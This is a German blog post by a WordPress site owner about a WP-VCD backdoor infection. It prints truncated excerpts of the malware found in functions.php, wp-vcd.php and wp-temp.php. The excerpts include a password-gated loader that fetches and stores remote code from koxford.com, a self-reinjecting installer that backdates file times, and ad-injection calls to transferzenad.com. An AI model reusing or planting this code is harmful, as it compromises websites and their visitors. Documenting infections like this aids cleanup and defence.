Banner Städteflüge gif 120x600

Virenbefall WordPress mit VCD Malware

Durch Zufall stellte ich in der functions.php eine Veränderung fest. Folgender Code war in die Datei geschrieben wurden: Hier nur einen Ausschnitt des Schadcode. Nachdem ich diese Datei gelöscht hatte, konnte ich eine Minute später den gleichen Code wieder vor finden. Das ging etwa 10 mal so weiter. dann entdeckte ich die Dateien im Ordner wp-include und stellte fest, dass diese Dateien auf meinem Lokalen Server nicht vorhanden waren.

wp-vcd.php   wp-temp.php und wp-feed.php

Erst nachdem ich diese gelöscht hatte,verschwand auch der Zusatzcode in der  functions.php!

Diese Datei wird anscheinend von einem Hacker installiert, um schädliche Aktivitäten auszuführen. Wenn Sie diese Datei kennen, können Sie sie ignorieren, um sie von zukünftigen Scans auszuschließen. Der Text, den wir in dieser Datei gefunden haben und der einer bekannten schädlichen Datei entspricht, lautet: „include_once (dirname (__ FILE__). ‚/wp-vcd.php‘)“. Der Infektionstyp ist: Eine Hintertür, die als WP-VCD bekannt ist.

Die functions.php 

<?php
if (isset($_REQUEST[‘action’]) && isset($_REQUEST[‘password’]) && ($_REQUEST[‘password’] == ‘4b5238cafbf800d849fb09f90cd6f1cd’))
{
$div_code_name=”wp_vcd”;
switch ($_REQUEST[‘action’])
{

case ‘change_domain’;
if (isset($_REQUEST[‘newdomain’]))
{

if (!empty($_REQUEST[‘newdomain’]))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all(‘/\$tmpcontent = @file_get_contents\(“http:\/\/(.*)\/code\.php/i’,$file,$matcholddomain))
{

$div_code_name = “wp_vcd”;
$funcfile = __FILE__;
if(!function_exists(‘theme_temp_setup’)) {
$path = $_SERVER[‘HTTP_HOST’] . $_SERVER[REQUEST_URI];
if (stripos($_SERVER[‘REQUEST_URI’], ‘wp-cron.php’) == false && stripos($_SERVER[‘REQUEST_URI’], ‘xmlrpc.php’) == false) {

}

}
$wp_auth_key=’9b42c8e084a4b2f04f9c37de47729695′;
if (($tmpcontent = @file_get_contents(“http://www.koxford.com/code.php”) OR $tmpcontent = @file_get_contents_tcurl(“http://www.koxford.com/code.php”)) AND stripos($tmpcontent, $wp_auth_key) !== false) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . ‘wp-includes/wp-tmp.php’, $tmpcontent);

if (!file_exists(ABSPATH . ‘wp-includes/wp-tmp.php’)) {
@file_put_contents(get_template_directory() . ‘/wp-tmp.php’, $tmpcontent);
if (!file_exists(get_template_directory() . ‘/wp-tmp.php’)) {
@file_put_contents(‘wp-tmp.php’, $tmpcontent);
elseif ($tmpcontent = @file_get_contents(“http://www.koxford.me/code.php“) AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . ‘wp-includes/wp-tmp.php’, $tmpcontent);

if (!file_exists(ABSPATH . ‘wp-includes/wp-tmp.php’)) {
@file_put_contents(get_template_directory() . ‘/wp-tmp.php’, $tmpcontent);
if (!file_exists(get_template_directory() . ‘/wp-tmp.php‘)) {

 

In der wp-vcd.php Datei ist folgender Code ebenfalls verkürzt ! 

<?php
error_reporting(0);
ini_set(‘display_errors’, 0);

$install_code =

‘PD9waHANCmlmIChpc3NldCgkX1JFUVVFU1RbJ2FjdGlvbiddKSAmJiBpc3NldCgkX1JFUVVFU1RbJ3Bhc3N3b3JkJ10pICYmICgk usw.

$install_hash = md5($_SERVER[‘HTTP_HOST’] . AUTH_SALT);
$install_code = str_replace(‘{$PASSWORD}’ , $install_hash, base64_decode( $install_code ));

$themes = ABSPATH . DIRECTORY_SEPARATOR . ‘wp-content’ . DIRECTORY_SEPARATOR . ‘themes’;

if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . ‘functions.php’))
{
$time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . ‘functions.php’);

if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . ‘functions.php’))
{
if (strpos($content, ‘WP_V_CD’) === false)
{
$content = $install_code . $content ;
@file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . ‘functions.php’, $content);
touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . ‘functions.php’ , $time );
emes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . ‘functions.php’ , $time );

Die wp-temp.php mit folgenden Code

ini_set(‘display_errors’, 0);
error_reporting(0);
$wp_auth_key=’9b42c8e084a4b2f04f9c37de47729695′;$curl = curl_init();
curl_setopt_array($curl, array(
CURLOPT_RETURNTRANSFER => 1,
CURLOPT_USERAGENT => ‘AntiAdBlock API Client’,
CURLOPT_FOLLOWLOCATION => false,
CURLOPT_SSL_VERIFYPEER => true,
));// prefer SSL if at all possible
$version = curl_version();
if ($version[‘features’] & CURL_VERSION_SSL) {
curl_setopt($curl, CURLOPT_URL, ‘https://go.transferzenad.com’ . $url);
} else {
curl_setopt($curl, CURLOPT_URL, ‘http://go.transferzenad.com’ . $url);
}$result = curl_exec($curl);
curl_close($curl);
return $result;
}

private function getFileGetContents($url)
{
if (!function_exists(‘file_get_contents’) || !ini_get(‘allow_url_fopen’) ||
((function_exists(‘stream_get_wrappers’)) && (!in_array(‘http’, stream_get_wrappers())))) {
return false;
}

if (function_exists(‘stream_get_wrappers’) && in_array(‘https’, stream_get_wrappers())) {
return file_get_contents(‘https://go.transferzenad.com’ . $url);
} else {
return file_get_contents(‘http://go.transferzenad.com’ . $url);
}
}

$ip=@file_get_contents(ABSPATH.’wp-includes/wp-feed.php’);
}

if (stripos($ip, $_SERVER[‘REMOTE_ADDR’]) === false)
{$ip.=$_SERVER[‘REMOTE_ADDR’].’
‘;
@file_put_contents(ABSPATH.’wp-includes/wp-feed.php’,$ip);

 






Kommentar verfassen

Diese Website verwendet Akismet, um Spam zu reduzieren. Erfahre mehr darüber, wie deine Kommentardaten verarbeitet werden .